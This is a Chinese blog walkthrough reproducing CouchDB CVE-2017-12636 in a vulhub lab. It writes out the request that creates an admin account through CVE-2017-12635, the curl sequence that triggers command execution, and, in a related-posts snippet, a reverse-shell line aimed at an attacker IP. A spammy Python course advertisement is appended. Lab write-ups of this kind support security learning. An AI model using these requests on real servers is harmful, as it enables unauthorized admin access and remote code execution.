13 - vulhub - Couchdb 任意命令执行漏洞(CVE-2017-12636)(1)

于 2024-04-12 01:56:08 发布
阅读量649 收藏 15
点赞数 8
分类专栏: 程序员 文章标签: couchdb
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83817171/article/details/137659689
版权
本文详细描述了如何在Couchdb1.6.0环境中利用CVE-2017-12635漏洞进行任意命令执行,包括环境搭建、漏洞检测方法和利用步骤,以及验证漏洞利用的方法。
摘要由CSDN通过智能技术生成

漏洞复现

环境准备

Couchdb 2.x和1.x的API接口有一定的区别,所以这个漏洞的利用方式也不同。本环境启动是1.6.0版本,如果你想测试2.1.0版本,可以启动CVE-2017- 12635附带的环境。

靶机环境 139.196.87.102 (vulhub)

攻击机环境 192.168.8.137 (虚拟机 Ubuntu 20、Java1.8、Burp)

启动 Couchdb 垂直权限绕过漏洞 环境

1.进入 vulhub 的 Couchdb 任意命令执行漏洞 路径

cd /usr/local/tools/vulhub/couchdb/CVE-2017-12636

2.编译并启动环境

docker-compose up -d

3.查看环境运行状态

docker ps | grep vulhub

在这里插入图片描述

启动完成后,访问http://139.196.87.102:5984/浏览Couchdb的欢迎页面。

在这里插入图片描述

漏洞检测

漏洞检测

开发或运维人员检查是否使用了受影响版本范围内的Apache CouchDB,是否配置了强口令和网络访问控制策略。

漏洞利用

该漏洞是需要登录用户方可触发,如果不知道目标管理员密码,可以利用 CVE-2017-12635 先增加一个管理员用户。

增加管理用户的数据包如下

PUT /_users/org.couchdb.user:vulhub HTTP/1.1

Host: 139.196.87.102:5984

Accept: /

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json

Content-Length: 108

{

“type”: “user”,

“name”: “vulhub”,

“roles”: [“_admin”],

“roles”: [],

“password”: “vulhub”

}

在这里插入图片描述

1.7.0 以下的说明

依次执行如下请求即可触发任意命令执行:

curl -X PUT ‘http://vulhub:vulhub@139.196.87.102:5984/_config/query_servers/cmd’ -d ‘“id >/tmp/success”’

curl -X PUT ‘http://vulhub:vulhub@139.196.87.102:5984/vultest’

curl -X PUT ‘http://vulhub:vulhub@139.196.87.102:5984/vultest/vul’ -d ‘{“_id”:“770895a97726d5ca6d70a22173005c7b”}’

curl -X POST ‘http://vulhub:vulhub@139.196.87.102:5984/vultest/_temp_view?limit=10’ -d ‘{“language”:“cmd”,“map”:“”}’ -H ‘Content-Type:application/json’

其中,vulhub:vulhub为管理员账号密码。

第一个请求是添加一个名字为cmd的query_servers,其值为"id >/tmp/success",这就是我们要执行的命令。

第二、三个请求是添加一个数据库和文档,这里添加了一个可以查询的。

第四个请求在这个数据库里进行,因为我将其设置为cmd,这里就是我最初cmd的开始添加的命名的query_servers最后触发命令执行。

在这里插入图片描述

验证漏洞利用是否成功

进入容器查看 /tmp/ 路径下 是否生成 success 文件

在这里插入图片描述

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数Python工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年Python开发全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。

img

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上前端开发知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以扫码获取!!!(备注Python)

mg.cn/img_convert/9f49b566129f47b8a67243c1008edf79.png)

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上前端开发知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以扫码获取!!!(备注Python)

img
2401_83817171
关注
  • 8
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CouchDB任意命令执行CVE-2017-12636
Kevin's Blog
07-26 982
文章目录一、漏洞原理二、触发条件三、漏洞场景 / 挖掘思路四、漏洞复现4.1 漏洞环境4.2 启动环境4.3 攻击过程五、防御措施 一、漏洞原理   CountDB通过RESTful JavaScript Object Notation (JSON) API访问,CouchDB默认在5984开放Restful的API接口,用于数据库管理。由于CouchDB允许用户指定一个二进制程序或脚本,于Cou...
Couchdb数据库-命令执行漏洞复现-CVE-2017-12636
apple_52661176的博客
08-31 210
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。0>&1""" #攻击机ip。开启vulfocus靶场环境。在攻击机上开启nc监听。
13 - vulhub - Couchdb 任意命令执行漏洞CVE-2017-12636
易编橙 · 终身成长社群,相遇已是上上签!
10-22 708
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞
Couchdb 命令执行漏洞复现 (CVE-2017-12636
XXokok的博客
11-25 279
Couchdb 命令执行漏洞复现 (CVE-2017-12636
Couchdb 任意命令执行漏洞(CVE-2017-12636)
最新发布
weixin_46239998的博客
01-01 769
command = rb"""sh -i >& /dev/tcp/192.168.217.128/5566 0>&1""" # 这里的ip为监听机ip也就是攻击机。target = 'http://192.168.217.128:5984' # 目标ip。如上图所示即反弹shell成功!三、构造payload。
Apache CouchDB信息泄露漏洞(CVE-2023-26268)通告
05-05
Apache CouchDB 信息泄露漏洞(CVE-2023-26268)通告 Apache CouchDB 是一个开源的 NoSQL 文档数据库,以基于 JSON 的文档格式收集和存储数据,提供了高可用性和高可靠性。近日,深信服安全团队监测到 Apache ...
nifi-couchdb:与CouchDB 2集成的Nifi处理器
02-03
nifi-couchdb 该项目提供了许多Nifi处理器,用于从CouchDB 2数据库获取文档和数据以及将文档和数据放入CouchDB 2数据库。 尚处于初期阶段-但我们有以下处理器可以工作: GetCouchDBAllDocuments-获取指定数据库的...
bitnami-docker-couchdb:用于CouchDB的Bitnami Docker映像
02-19
什么是CouchDBCouchDB是一个开放源代码NoSQL数据库,用于存储带有JSON文档的数据,您可以通过HTTP访问该文档。 它允许您使用JavaScript索引,合并和转换文档。TL; DR $ docker run --name couchdb bitnami/...
couch-rules-engine:将 CouchDB 用作规则引擎的原型工作
05-31
Couch 规则:使用 CouchDB 作为规则引擎 这是一个原型工作,用于评估使用作为使用内置的规则引擎的基础的适用性。 CouchDB 概述 CouchDB是一个面向文档的数据库,以JSON格式存储文档,支持查询文档。 CouchDB 公开了...
Couchdb 任意命令执行漏洞CVE-2017-12636
weixin_44311721的博客
07-30 1431
Couchdb 任意命令执行漏洞CVE-2017-12636Couchdb简介: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的...
Apache couchdb 命令执行CVE-2017-12636)复现
YouthBelief的博客
11-04 785
couchdb 命令执行CVE-2017-12636couchdb 命令执行CVE-2017-12636)0x01 漏洞描述0x02 影响范围0x03 漏洞复现工具复现0x04 漏洞修复 couchdb 命令执行CVE-2017-12636) Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展
Couchdb 任意命令执行漏洞CVE-2017-12636)复现
HEAVEN569的博客
06-21 1073
Couchdb 任意命令执行漏洞CVE-2017-12636)复现
CouchDB 漏洞复现 CVE-2017-12635/12636
sechelper的博客
02-11 374
CouchDBCVE-2017-12635和12636联合利用,详细漏洞复现,exp下载获取
couchdb 任意命令执行漏洞 cve-2017-12636
whatday的专栏
01-30 318
Couchdb简介: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 漏洞简介: CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Obj
couchdb 任意命令执行漏洞cve-2017-12636
whatday的专栏
06-08 2300
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞
SequoiaDB:分布式NoSQL数据库详解-王涛
在NoSQL数据库的分类中,SequoiaDB属于文档型数据库,与MongoDB和CouchDB等同类产品竞争,同时也与KV型如Redis和BigTable型如Cassandra、HBase等数据库共同构成了NoSQL数据库的多样性。 SequoiaDB的架构设计是一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值